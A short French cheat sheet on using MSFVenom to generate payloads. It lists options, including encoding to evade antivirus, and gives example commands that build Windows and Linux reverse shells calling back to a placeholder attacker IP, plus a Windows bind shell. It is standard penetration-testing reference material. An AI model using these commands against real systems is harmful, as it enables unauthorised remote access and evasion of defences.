MSFVenom

Cheatsheet de la génération de payload ( charge utile ) avec MSFVenom

Génération de Payloads avec MSFVenom :

msfvenom -p <payload> [options]

Options courantes :

  • -p <payload> : Spécifie le type de payload (ex. windows/meterpreter/reverse_tcp, linux/x86/shell_reverse_tcp).

  • -f <format> : Spécifie le format de sortie (ex. exe, raw, python, ruby).

  • -o <output> : Spécifie le fichier de sortie pour la charge utile générée.

  • LHOST=<IP> : Spécifie l'adresse IP de l'attaquant pour le "reverse shell".

  • LPORT=<port> : Spécifie le port de l'attaquant pour le "reverse shell" ou le port d'écoute pour le "bind shell".

  • --encoder <encoder> : Encode la charge utile pour éviter la détection par les antivirus.

  • --platform <platform> : Spécifie la plateforme cible (ex. Windows, Linux).

Exemples d'utilisation :

  1. Générer un "reverse shell" Windows en format executable :

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP de l'attaquant> LPORT=<port> -f exe -o shell.exe

  2. Générer un "reverse shell" Linux en langage Python :

    msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP de l'attaquant> LPORT=<port> -f python -o shell.py

  3. Générer un "bind shell" Windows en format raw :

    msfvenom -p windows/shell_bind_tcp LPORT=<port> -f raw -o bind_shell.bin

Last updated